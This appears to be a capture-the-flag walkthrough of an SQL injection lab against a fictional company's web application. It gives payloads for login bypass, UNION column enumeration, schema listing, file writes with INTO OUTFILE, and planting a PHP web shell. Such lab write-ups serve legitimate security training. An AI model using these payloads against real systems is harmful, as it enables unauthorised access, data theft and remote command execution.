The company `Inlanefreight` has contracted you to perform a web application assessment against one of their public-facing websites. 
* In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.

They provided a target IP address and no further information about their website. Perform a full assessment of the web application from a "grey box" approach, checking for the existence of SQL injection vulnerabilities.

admin' or '1'='1'-- -

- `or '1'='1'` is a condition that always evaluates to true.
- `-- -` comments out the rest of the query to bypass the password check.

'UNION SELECT 1-- -


The result is an error message **“The used SELECT statements have a different number of columns”** indicates that your SQL injection query failed because the number of columns in your injected `UNION SELECT` query doesn't match the number of columns returned by the original query.

Add columns to the`UNION SELECT` query until the error message disappears.

' UNION SELECT 1,2,3,4,5-- -

Now that you know the number of columns we can retrieve the version of the database by replacing one of the columns with `@@version`

Retrieve the **schema names** (databases) from the `**INFORMATION_SCHEMA.SCHEMATA**` table.

' UNION SELECT 1, schema_name, 3, 4, 5 FROM INFORMATION_SCHEMA.SCHEMATA--


Now crate SQL injection query that writes the text `'file written successfully!'` into a file located at `/var/www/html/dashboard/proof.txt` on the server.

' UNION SELECT 1, 'file written successfully!', 3, 4, 5 INTO OUTFILE '/var/www/html/dashboard/proof.txt' --


' UNION SELECT 1, 2, '<?php system($_REQUEST[0]); ?>', 4, 5 INTO OUTFILE '/var/www/html/dashboard/shell.php'-- -

https://iritt.medium.com/sql-injection-fundamentals-hackthebox-academy-walkthrough-160fa4a9d731